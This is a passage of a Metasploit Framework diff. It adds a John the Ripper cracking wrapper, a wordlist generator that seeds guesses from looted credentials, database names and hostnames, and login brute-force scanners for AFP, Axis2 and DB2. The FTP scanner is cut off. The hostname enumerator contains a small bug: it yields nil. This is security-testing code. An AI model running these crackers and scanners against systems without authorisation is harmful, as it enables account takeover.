+            cmd << ( "--config=" + john_config_file )
+          end
+
+          if pot.present?
+            cmd << ( "--pot=" + pot )
+          else
+            cmd << ( "--pot=" + john_pot_file)
+          end
+
+          if format.present?
+            cmd << ( "--format=" + format )
+          end
+
+          if wordlist.present?
+            cmd << ( "--wordlist=" + wordlist )
+          end
+
+          if incremental.present?
+            cmd << ( "--incremental=" + incremental )
+          end
+
+          if rules.present?
+            cmd << ( "--rules=" + rules )
+          end
+
+          if max_runtime.present?
+            cmd << ( "--max-run-time=" + max_runtime.to_s)
+          end
+
+          cmd << hash_path
+        end
+
+        # This runs the show command in john and yields cracked passwords.
+        #
+        # @yield [String] the output lines from the command
+        # @return [void]
+        def each_cracked_password
+          ::IO.popen(show_command, "rb") do |fd|
+            fd.each_line do |line|
+              yield line
+            end
+          end
+        end
+
+        # This method returns the path to a default john.conf file.
+        #
+        # @return [String] the path to the default john.conf file
+        def john_config_file
+          ::File.join( ::Msf::Config.data_directory, "john", "confs", "john.conf" )
+        end
+
+        # This method returns the path to a default john.pot file.
+        #
+        # @return [String] the path to the default john.pot file
+        def john_pot_file
+          ::File.join( ::Msf::Config.config_directory, "john.pot" )
+        end
+
+        # This method is a getter for a random Session ID for John.
+        # It allows us to dinstiguish between cracking sessions.
+        #
+        # @ return [String] the Session ID to use
+        def john_session_id
+          @session_id ||= ::Rex::Text.rand_text_alphanumeric(8)
+        end
+
+        # This method builds the command to show the cracked passwords.
+        #
+        # @raise [JohnNotFoundError] if a suitable John binary was never found
+        # @return [Array] An array set up for {::IO.popen} to use
+        def show_command
+          cmd_string = binary_path
+
+          pot_file = pot || john_pot_file
+          cmd = [cmd_string, "--show", "--pot=#{pot_file}", "--format=#{format}" ]
+
+          if config
+            cmd << "--config=#{config}"
+          else
+            cmd << ( "--config=" + john_config_file )
+          end
+
+          cmd << hash_path
+        end
+
+        private
+
+        # This method tries to identify the correct version of the pre-shipped
+        # JtR binaries to use based on the platform.
+        #
+        # @return [NilClass] if the correct binary could not be determined
+        # @return [String] the path to the selected binary
+        def select_shipped_binary
+          cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
+          run_path = nil
+          if File.directory?(cpuinfo_base)
+            data = nil
+
+            case ::RUBY_PLATFORM
+              when /mingw|cygwin|mswin/
+                fname = "#{cpuinfo_base}/cpuinfo.exe"
+                if File.exists?(fname) and File.executable?(fname)
+                  data = %x{"#{fname}"} rescue nil
+                end
+                case data
+                  when /sse2/
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.win32.sse2", "john.exe")
+                  when /mmx/
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.win32.mmx", "john.exe")
+                  else
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.win32.any", "john.exe")
+                end
+              when /x86_64-linux/
+                fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
+                if File.exists? fname
+                  ::FileUtils.chmod(0755, fname) rescue nil
+                  data = %x{"#{fname}"} rescue nil
+                end
+                case data
+                  when /mmx/
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.linux.x64.mmx", "john")
+                  else
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.linux.x86.any", "john")
+                end
+              when /i[\d]86-linux/
+                fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
+                if File.exists? fname
+                  ::FileUtils.chmod(0755, fname) rescue nil
+                  data = %x{"#{fname}"} rescue nil
+                end
+                case data
+                  when /sse2/
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.linux.x86.sse2", "john")
+                  when /mmx/
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.linux.x86.mmx", "john")
+                  else
+                    run_path ||= ::File.join(Msf::Config.data_directory, "john", "run.linux.x86.any", "john")
+                end
+            end
+          end
+          run_path
+        end
+
+
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/jtr/invalid_wordlist.rb b/lib/metasploit/framework/jtr/invalid_wordlist.rb
new file mode 100644
index 0000000000..edf91b9505
--- /dev/null
+++ b/lib/metasploit/framework/jtr/invalid_wordlist.rb
@@ -0,0 +1,20 @@
+module Metasploit
+  module Framework
+    module JtR
+
+      # This class is the generic Exception raised by a {Wordlist} when
+      # it fails validation. It rolls up all validation errors into a
+      # single exception so that all errors can be dealt with at once.
+      class InvalidWordlist < StandardError
+        attr_reader :model
+
+        def initialize(model)
+          @model = model
+
+          errors = @model.errors.full_messages.join(', ')
+          super(errors)
+        end
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/jtr/wordlist.rb b/lib/metasploit/framework/jtr/wordlist.rb
new file mode 100644
index 0000000000..1b8a395eef
--- /dev/null
+++ b/lib/metasploit/framework/jtr/wordlist.rb
@@ -0,0 +1,429 @@
+require 'metasploit/framework/jtr/invalid_wordlist'
+
+module Metasploit
+  module Framework
+    module JtR
+
+      class Wordlist
+        include ActiveModel::Validations
+
+        # A mapping of the mutation substitution rules
+        MUTATIONS = {
+            '@' => 'a',
+            '0' => 'o',
+            '3' => 'e',
+            '$' => 's',
+            '7' => 't',
+            '1' => 'l',
+            '5' => 's'
+        }
+
+        # @!attribute appenders
+        #   @return [Array] an array of strings to append to each word
+        attr_accessor :appenders
+
+        # @!attribute custom_wordlist
+        #   @return [String] the path to a custom wordlist file to include
+        attr_accessor :custom_wordlist
+
+        # @!attribute mutate
+        #   @return [TrueClass] if you want each word mutated as it is added
+        #   @return [FalseClass] if you do not want each word mutated
+        attr_accessor :mutate
+
+        # @!attribute prependers
+        #   @return [Array] an array of strings to prepend to each word
+        attr_accessor :prependers
+
+        # @!attribute use_common_root
+        #   @return [TrueClass] if you want to use the common root words wordlist
+        #   @return [FalseClass] if you do not want to use the common root words wordlist
+        attr_accessor :use_common_root
+
+        # @!attribute use_creds
+        #   @return [TrueClass] if you want to seed the wordlist with existing credential data from the database
+        #   @return [FalseClass] if you do not want to seed the wordlist with existing credential data from the database
+        attr_accessor :use_creds
+
+        # @!attribute use_db_info
+        #   @return [TrueClass] if you want to seed the wordlist with looted database names and schemas
+        #   @return [FalseClass] if you do not want to seed the wordlist with looted database names and schemas
+        attr_accessor :use_db_info
+
+        # @!attribute use_default_wordlist
+        #   @return [TrueClass] if you want to use the default wordlist
+        #   @return [FalseClass] if you do not want to use the default wordlist
+        attr_accessor :use_default_wordlist
+
+        # @!attribute use_hostnames
+        #   @return [TrueClass] if you want to seed the wordlist with existing hostnames from the database
+        #   @return [FalseClass] if you do not want to seed the wordlist with existing hostnames from the database
+        attr_accessor :use_hostnames
+
+        # @!attribute workspace
+        #   @return [Mdm::Workspace] the workspace this cracker is for.
+        attr_accessor :workspace
+
+        validates :custom_wordlist, :'Metasploit::Framework::File_path' => true, if: 'custom_wordlist.present?'
+
+        validates :mutate,
+                  inclusion: { in: [true, false], message: "must be true or false"  }
+
+
+        validates :use_common_root,
+                  inclusion: { in: [true, false], message: "must be true or false"  }
+
+        validates :use_creds,
+                  inclusion: { in: [true, false], message: "must be true or false"  }
+
+        validates :use_db_info,
+                  inclusion: { in: [true, false], message: "must be true or false"  }
+
+        validates :use_default_wordlist,
+                  inclusion: { in: [true, false], message: "must be true or false"  }
+
+        validates :use_hostnames,
+                  inclusion: { in: [true, false], message: "must be true or false"  }
+
+        validates :workspace,
+                  presence: true
+
+        # @param attributes [Hash{Symbol => String,nil}]
+        def initialize(attributes={})
+          attributes.each do |attribute, value|
+            public_send("#{attribute}=", value)
+          end
+          @appenders  ||= []
+          @prependers ||= []
+        end
+
+        # This method takes a word, and appends each word from the appenders list
+        # and yields the new words.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_appended_word(word='')
+          yield word
+          appenders.each do |suffix|
+            yield "#{word}#{suffix}"
+          end
+        end
+
+        # This method checks all the attributes set on the object and calls
+        # the appropriate enumerators for each option and yields the results back
+        # up the call-chain.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_base_word
+          # Make sure are attributes are all valid first!
+          valid!
+
+          # Yield the expanded form of each line of the custom wordlist if one was given
+          if custom_wordlist.present?
+            each_custom_word do |word|
+              yield word unless word.blank?
+            end
+          end
+
+          # Yield each word from the common root words list if it was selected
+          if use_common_root
+            each_root_word do |word|
+              yield word unless word.blank?
+            end
+          end
+
+          # If the user has selected use_creds we yield each password, username, and realm name
+          # that currently exists in the database.
+          if use_creds
+            each_cred_word do |word|
+              yield word unless word.blank?
+            end
+          end
+
+          if use_db_info
+            each_database_word do |word|
+              yield word unless word.blank?
+            end
+          end
+
+          if use_default_wordlist
+            each_default_word do |word|
+              yield word unless word.blank?
+            end
+          end
+
+          if use_hostnames
+            each_hostname_word do |word|
+              yield word unless word.blank?
+            end
+          end
+
+        end
+
+        # This method searches all saved Credentials in the database
+        # and yields all passwords, usernames, and realm names it finds.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_cred_word
+          # We don't want all Private types here. Only Passwords make sense for inclusion in the wordlist.
+          Metasploit::Credential::Password.all.each do |password|
+            yield password.data
+          end
+
+          Metasploit::Credential::Public.all.each do |public|
+            yield public.username
+          end
+
+          Metasploit::Credential::Realm.all.each do |realm|
+            yield realm.value
+          end
+        end
+
+        # This method reads the file provided as custom_wordlist and yields
+        # the expanded form of each word in the list.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_custom_word
+          ::File.open(custom_wordlist, "rb") do |fd|
+            fd.each_line do |line|
+              expanded_words(line) do |word|
+                yield word
+              end
+            end
+          end
+        end
+
+        # This method searches the notes in the current workspace
+        # for DB instance names, database names, table names, and
+        # column names gathered from live database servers. It yields
+        # each one that it finds.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_database_word
+          # Yield database, table and column names from any looted database schemas
+          workspace.notes.where('ntype like ?', '%.schema%').each do |note|
+            expanded_words(note.data['DBName']) do |word|
+              yield word
+            end
+
+            note.data['Tables'].each do |table|
+              expanded_words(table['TableName']) do |word|
+                yield word
+              end
+
+              table['Columns'].each do |column|
+                expanded_words(column['ColumnName']) do |word|
+                  yield word
+                end
+              end
+            end
+          end
+
+          # Yield any capture MSSQL Instance names
+          workspace.notes.find(:all, :conditions => ['ntype=?', 'mssql.instancename']).each do |note|
+            expanded_words(note.data['InstanceName']) do |word|
+              yield word
+            end
+          end
+        end
+
+        # This method yields expanded words taken from the default john
+        # wordlist that we ship in the data directory.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_default_word
+          ::File.open(default_wordlist_path, "rb") do |fd|
+            fd.each_line do |line|
+              expanded_words(line) do |word|
+                yield word
+              end
+            end
+          end
+        end
+
+        # This method yields the expanded words out of all the hostnames
+        # found in the current workspace.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_hostname_word
+          workspace.hosts.all.each do |host|
+            unless host.name.nil?
+              expanded_words(host.name) do |word|
+                yield nil
+              end
+            end
+          end
+        end
+
+        # This method checks to see if the user asked for mutations. If mutations
+        # have been enabled, then it creates all the unique mutations and yields
+        # each result.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_mutated_word(word='')
+          mutants = [ ]
+
+          # Run the mutations only if the option is set
+          if mutate
+            mutants = mutants + mutate_word(word)
+          end
+
+          mutants << word
+          mutants.uniq.each do |mutant|
+            yield mutant
+          end
+        end
+
+        # This method takes a word, and prepends each word from the prependers list
+        # and yields the new words.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_prepended_word(word='')
+          yield word
+          prependers.each do |prefix|
+            yield "#{prefix}#{word}"
+          end
+        end
+
+        # This method reads the common_roots.txt wordlist
+        # expands any words in the list and yields them.
+        #
+        # @yieldparam word [String] the expanded word
+        # @return [void]
+        def each_root_word
+          ::File.open(common_root_words_path, "rb") do |fd|
+            fd.each_line do |line|
+              expanded_words(line) do |word|
+                yield word
+              end
+            end
+          end
+        end
+
+        # This method wraps around all the other enumerators. It processes
+        # all of the options and yields each word generated by the options
+        # selected.
+        #
+        # @yieldparam word [String] the word to write out to the wordlist file
+        # @return [void]
+        def each_word
+          each_base_word do |base_word|
+            each_mutated_word(base_word) do |mutant|
+              each_prepended_word(mutant) do |prepended|
+                yield prepended
+              end
+
+              each_appended_word(mutant) do |appended|
+                yield appended
+              end
+            end
+          end
+        end
+
+        # This method takes a string and splits it on non-word characters
+        # and the underscore. It does this to find likely distinct words
+        # in the string. It then yields each 'word' found this way.
+        #
+        # @param word [String] the string to split apart
+        # @yieldparam expanded [String] the expanded words
+        # @return [void]
+        def expanded_words(word='')
+          word.split(/[\W_]+/).each do |expanded|
+            yield expanded
+          end
+        end
+
+        # This method takes a word and applies various mutation rules to that word
+        # and returns an array of all the mutated forms.
+        #
+        # @param word [String] the word to apply the mutations to
+        # @return [Array<String>] An array containing all the mutated forms of the word
+        def mutate_word(word)
+          results = []
+          # Iterate through combinations to create each possible mutation
+          mutation_keys.each do |iteration|
+            next if iteration.flatten.empty?
+            intermediate = word.dup
+            subsititutions = iteration.collect { |key| MUTATIONS[key] }
+            intermediate.tr!(subsititutions.join, iteration.join)
+            results << intermediate
+          end
+          results.flatten.uniq
+        end
+
+        # A getter for a memoized version fo the mutation keys list
+        #
+        # @return [Array<Array>] a 2D array of all mutation combinations
+        def mutation_keys
+          @mutation_keys ||= generate_mutation_keys
+        end
+
+        # This method takes all the options provided and streams the generated wordlist out
+        # to a {Rex::Quickfile} and returns the {Rex::Quickfile}.
+        #
+        # @return [Rex::Quickfile] The {Rex::Quickfile} object that the wordlist has been written to
+        def to_file
+          valid!
+          wordlist_file = Rex::Quickfile.new("jtrtmp")
+          each_word do |word|
+            wordlist_file.puts word
+          end
+          wordlist_file
+        end
+
+        # Raise an exception if the attributes are not valid.
+        #
+        # @raise [Invalid] if the attributes are not valid on this scanner
+        # @return [void]
+        def valid!
+          unless valid?
+            raise Metasploit::Framework::JtR::InvalidWordlist.new(self)
+          end
+          nil
+        end
+
+
+
+        private
+
+        # This method returns the path to the common_roots.txt wordlist
+        #
+        # @return [String] the file path to the common_roots.txt file
+        def common_root_words_path
+          ::File.join(Msf::Config.data_directory, 'john', 'wordlists', 'common_roots.txt')
+        end
+
+        # This method returns the path to the passwords.lst wordlist
+        #
+        # @return [String] the file path to the passwords.lst file
+        def default_wordlist_path
+          ::File.join(Msf::Config.data_directory, 'john', 'wordlists', 'password.lst')
+        end
+
+        def generate_mutation_keys
+          iterations = MUTATIONS.keys.dup
+
+          # Find PowerSet of all possible mutation combinations
+          iterations.inject([[]]) do |accumulator,mutation_key|
+            power_set = []
+            accumulator.each do |i|
+              power_set << i
+              power_set << i+[mutation_key]
+            end
+            power_set
+          end
+        end
+
+      end
+
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/login_scanner.rb b/lib/metasploit/framework/login_scanner.rb
new file mode 100644
index 0000000000..1730977b7a
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner.rb
@@ -0,0 +1,47 @@
+require 'metasploit/framework/credential'
+
+module Metasploit
+  module Framework
+    # This module provides the namespace for all LoginScanner classes.
+    # LoginScanners are the classes that provide functionality for testing
+    # authentication against various different protocols and mechanisms.
+    module LoginScanner
+      require 'metasploit/framework/login_scanner/result'
+      require 'metasploit/framework/login_scanner/invalid'
+
+      # Gather a list of LoginScanner classes that can potentially be
+      # used for a given `service`, which should usually be an
+      # `Mdm::Service` object, but can be anything that responds to
+      # #name and #port.
+      #
+      # @param service [Mdm::Service,#port,#name]
+      # @return [Array<LoginScanner::Base>] A collection of LoginScanner
+      #   classes that will probably give useful results when run
+      #   against `service`.
+      def self.classes_for_service(service)
+
+        unless @required
+          # Make sure we've required all the scanner classes
+          dir = File.expand_path("../login_scanner/", __FILE__)
+          Dir.glob(File.join(dir, "*.rb")).each do |f|
+            require f if File.file?(f)
+          end
+          @required = true
+        end
+
+        self.constants.map{|sym| const_get(sym)}.select do |const|
+          next unless const.kind_of?(Class)
+
+          (
+            const.const_defined?(:LIKELY_PORTS) &&
+            const.const_get(:LIKELY_PORTS).include?(service.port)
+          ) || (
+            const.const_defined?(:LIKELY_SERVICE_NAMES) &&
+            const.const_get(:LIKELY_SERVICE_NAMES).include?(service.name)
+          )
+        end
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/afp.rb b/lib/metasploit/framework/login_scanner/afp.rb
new file mode 100644
index 0000000000..73d6f59294
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/afp.rb
@@ -0,0 +1,50 @@
+require 'metasploit/framework/tcp/client'
+require 'metasploit/framework/afp/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with Apple Filing
+      # Protocol.
+      class AFP
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+        include Metasploit::Framework::AFP::Client
+
+        DEFAULT_PORT         = 548
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ "afp" ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # @!attribute login_timeout
+        #   @return [Integer] Number of seconds to wait before giving up
+        attr_accessor :login_timeout
+
+        def attempt_login(credential)
+          begin
+            connect
+          rescue Rex::ConnectionError, EOFError, Timeout::Error
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          else
+            success = login(credential.public, credential.private)
+            status = (success == true) ? Metasploit::Model::Login::Status::SUCCESSFUL : Metasploit::Model::Login::Status::INCORRECT
+          end
+
+          Result.new(credential: credential, status: status)
+        end
+
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+        end
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/axis2.rb b/lib/metasploit/framework/login_scanner/axis2.rb
new file mode 100644
index 0000000000..ef34c31040
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/axis2.rb
@@ -0,0 +1,67 @@
+
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # Tomcat Manager login scanner
+      class Axis2 < HTTP
+
+        DEFAULT_PORT = 8080
+        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
+
+        CAN_GET_SESSION = true
+        PRIVATE_TYPES   = [ :password ]
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+          http_client = Rex::Proto::Http::Client.new(
+            host, port, {}, ssl, ssl_version
+          )
+
+          result_opts = {
+              credential: credential
+          }
+          begin
+            http_client.connect
+            body = "userName=#{Rex::Text.uri_encode(credential.public)}&password=#{Rex::Text.uri_encode(credential.private)}&submit=+Login+"
+            request = http_client.request_cgi(
+              'uri' => uri,
+              'method' => "POST",
+              'data' => body,
+            )
+            response = http_client.send_recv(request)
+
+            if response && response.code == 200 && response.body.include?("upload")
+              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response)
+            else
+              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: response)
+            end
+          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          end
+
+          Result.new(result_opts)
+
+        end
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.uri = "/axis2/axis2-admin/login" if self.uri.nil?
+          @method = "POST".freeze
+
+          super
+        end
+
+        # The method *must* be "POST", so don't let the user change it
+        # @raise [RuntimeError]
+        def method=(_)
+          raise RuntimeError, "Method must be POST for Axis2"
+        end
+
+      end
+    end
+  end
+end
+
diff --git a/lib/metasploit/framework/login_scanner/base.rb b/lib/metasploit/framework/login_scanner/base.rb
new file mode 100644
index 0000000000..2d40fb948d
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/base.rb
@@ -0,0 +1,222 @@
+require 'metasploit/framework/login_scanner'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This module provides the base behaviour for all of
+      # the LoginScanner classes. All of the LoginScanners
+      # should include this module to establish base behaviour
+      module Base
+        extend ActiveSupport::Concern
+        include ActiveModel::Validations
+
+        included do
+          # @!attribute connection_timeout
+          #   @return [Fixnum] The timeout in seconds for a single SSH connection
+          attr_accessor :connection_timeout
+          # @!attribute cred_details
+          #   @return [CredentialCollection] Collection of Credential objects
+          attr_accessor :cred_details
+          # @!attribute host
+          #   @return [String] The IP address or hostname to connect to
+          attr_accessor :host
+          # @!attribute port
+          #   @return [Fixnum] The port to connect to
+          attr_accessor :port
+          # @!attribute proxies
+          #   @return [String] The proxy directive to use for the socket
+          attr_accessor :proxies
+          # @!attribute stop_on_success
+          #   @return [Boolean] Whether the scanner should stop when it has found one working Credential
+          attr_accessor :stop_on_success
+
+          validates :connection_timeout,
+                    presence: true,
+                    numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 1
+                    }
+
+          validates :cred_details, presence: true
+
+          validates :host, presence: true
+
+          validates :port,
+                    presence: true,
+                    numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 1,
+                      less_than_or_equal_to:    65535
+                    }
+
+          validates :stop_on_success,
+                    inclusion: { in: [true, false] }
+
+          validate :host_address_must_be_valid
+
+          validate :validate_cred_details
+
+          # @param attributes [Hash{Symbol => String,nil}]
+          def initialize(attributes={})
+            attributes.each do |attribute, value|
+              public_send("#{attribute}=", value)
+            end
+            set_sane_defaults
+          end
+
+          # Attempt a single login against the service with the given
+          # {Credential credential}.
+          #
+          # @param credential [Credential] The credential object to attmpt to
+          #   login with
+          # @return [Result] A Result object indicating success or failure
+          # @abstract Protocol-specific scanners must implement this for their
+          #   respective protocols
+          def attempt_login(credential)
+            raise NotImplementedError
+          end
+
+
+          def each_credential
+            cred_details.each do |raw_cred|
+              # This could be a Credential object, or a Credential Core, or an Attempt object
+              # so make sure that whatever it is, we end up with a Credential.
+              credential = raw_cred.to_credential
+
+              if credential.realm.present? && self.class::REALM_KEY.present?
+                credential.realm_key = self.class::REALM_KEY
+                yield credential
+              elsif credential.realm.blank? && self.class::REALM_KEY.present? && self.class::DEFAULT_REALM.present?
+                credential.realm_key = self.class::REALM_KEY
+                credential.realm     = self.class::DEFAULT_REALM
+                yield credential
+              elsif credential.realm.present? && self.class::REALM_KEY.blank?
+                second_cred = credential.dup
+                # Strip the realm off here, as we don't want it
+                credential.realm = nil
+                credential.realm_key = nil
+                yield credential
+                # Some services can take a domain in the username like this even though
+                # they do not explicitly take a domain as part of the protocol.
+                second_cred.public = "#{second_cred.realm}\\#{second_cred.public}"
+                second_cred.realm = nil
+                second_cred.realm_key = nil
+                yield second_cred
+              else
+                yield credential
+              end
+            end
+          end
+
+          # Attempt to login with every {Credential credential} in
+          # {#cred_details}, by calling {#attempt_login} once for each.
+          #
+          # If a successful login is found for a user, no more attempts
+          # will be made for that user.
+          #
+          # @yieldparam result [Result] The {Result} object for each attempt
+          # @yieldreturn [void]
+          # @return [void]
+          def scan!
+            valid!
+
+            # Keep track of connection errors.
+            # If we encounter too many, we will stop.
+            consecutive_error_count = 0
+            total_error_count = 0
+
+            successful_users = Set.new
+
+            each_credential do |credential|
+              # For Pro bruteforce Reuse and Guess we need to note that we skipped an attempt.
+              if successful_users.include?(credential.public)
+                if credential.parent.respond_to?(:skipped)
+                  credential.parent.skipped = true
+                  credential.parent.save!
+                end
+                next
+              end
+
+              result = attempt_login(credential)
+              result.freeze
+
+              yield result if block_given?
+
+              if result.success?
+                consecutive_error_count = 0
+                break if stop_on_success
+                successful_users << credential.public
+              else
+                if result.status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+                  consecutive_error_count += 1
+                  total_error_count += 1
+                  break if consecutive_error_count >= 3
+                  break if total_error_count >= 10
+                end
+              end
+            end
+            nil
+          end
+
+          # Raise an exception if this scanner's attributes are not valid.
+          #
+          # @raise [Invalid] if the attributes are not valid on this scanner
+          # @return [void]
+          def valid!
+            unless valid?
+              raise Metasploit::Framework::LoginScanner::Invalid.new(self)
+            end
+            nil
+          end
+
+
+          private
+
+          # This method validates that the host address is both
+          # of a valid type and is resolveable.
+          # @return [void]
+          def host_address_must_be_valid
+            if host.kind_of? String
+              begin
+                resolved_host = ::Rex::Socket.getaddress(host, true)
+                if host =~ /^\d{1,3}(\.\d{1,3}){1,3}$/
+                  unless host =~ Rex::Socket::MATCH_IPV4
+                    errors.add(:host, "could not be resolved")
+                  end
+                end
+                self.host = resolved_host
+              rescue
+                errors.add(:host, "could not be resolved")
+              end
+            else
+              errors.add(:host, "must be a string")
+            end
+          end
+
+          # This is a placeholder method. Each LoginScanner class
+          # will override this with any sane defaults specific to
+          # its own behaviour.
+          # @abstract
+          # @return [void]
+          def set_sane_defaults
+            self.connection_timeout = 30 if self.connection_timeout.nil?
+          end
+
+          # This method validates that the credentials supplied
+          # are all valid.
+          # @return [void]
+          def validate_cred_details
+            unless cred_details.respond_to? :each
+              errors.add(:cred_details, "must respond to :each")
+            end
+          end
+
+        end
+
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/db2.rb b/lib/metasploit/framework/login_scanner/db2.rb
new file mode 100644
index 0000000000..889a15d3dc
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/db2.rb
@@ -0,0 +1,134 @@
+require 'metasploit/framework/tcp/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # This is the LoginScanner class for dealing with DB2 Database servers.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class DB2
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 50000
+        DEFAULT_REALM        = 'toolsdb'
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        # @todo XXX
+        LIKELY_SERVICE_NAMES = [ ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = Metasploit::Model::Realm::Key::DB2_DATABASE
+
+        # @see Base#attempt_login
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          begin
+            probe_data = send_probe(credential.realm)
+
+            if probe_data.empty?
+              result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            else
+              if authenticate?(credential)
+                result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+              else
+                result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+              end
+            end
+          rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout, ::Rex::Proto::DRDA::RespError,::Timeout::Error  => e
+            result_options.merge!({
+              status:  Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof: e.message
+            })
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+        # This method takes the credential and actually attempts the authentication
+        # @param credential [Credential] The Credential object to authenticate with.
+        # @return [Boolean] Whether the authentication was successful
+        def authenticate?(credential)
+          # Send the login packet and get a response packet back
+          login_packet = Rex::Proto::DRDA::Utils.client_auth(:dbname => credential.realm,
+            :dbuser => credential.public,
+            :dbpass => credential.private
+          )
+          sock.put login_packet
+          response = sock.get_once
+          if valid_response?(response)
+            if successful_login?(response)
+              true
+            else
+              false
+            end
+          else
+            false
+          end
+        end
+
+        # This method opens a socket to the target DB2 server.
+        # It then sends a client probe on that socket to get information
+        # back on the server.
+        # @param database_name [String] The name of the database to probe
+        # @return [Hash] A hash containing the server information from the probe reply
+        def send_probe(database_name)
+          disconnect if self.sock
+          connect
+
+          probe_packet = Rex::Proto::DRDA::Utils.client_probe(database_name)
+          sock.put probe_packet
+          response = sock.get_once
+
+          response_data = {}
+          if valid_response?(response)
+            packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response)
+            response_data = Rex::Proto::DRDA::Utils.server_packet_info(packet)
+          end
+          response_data
+        end
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+
+          self.ssl = false  if self.ssl.nil?
+        end
+
+        # This method takes a response packet and checks to see
+        # if the authentication was actually successful.
+        #
+        # @param response [String] The unprocessed response packet
+        # @return [Boolean] Whether the authentication was successful
+        def successful_login?(response)
+          packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response)
+          packet_info = Rex::Proto::DRDA::Utils.server_packet_info(packet)
+          if packet_info[:db_login_success]
+            true
+          else
+            false
+          end
+        end
+
+        # This method provides a simple test on whether the response
+        # packet was valid.
+        #
+        # @param response [String] The response to examine from the socket
+        # @return [Boolean] Whether the response is valid
+        def valid_response?(response)
+          response && response.length > 0
+        end
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/ftp.rb b/lib/metasploit/framework/login_scanner/ftp.rb
new file mode 100644
index 0000000000..3ac0a4d696
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/ftp.rb
@@ -0,0 +1,76 @@
+require 'metasploit/framework/ftp/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with FTP.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class FTP
+        include Metasploit::Framework::LoginScanner::Base
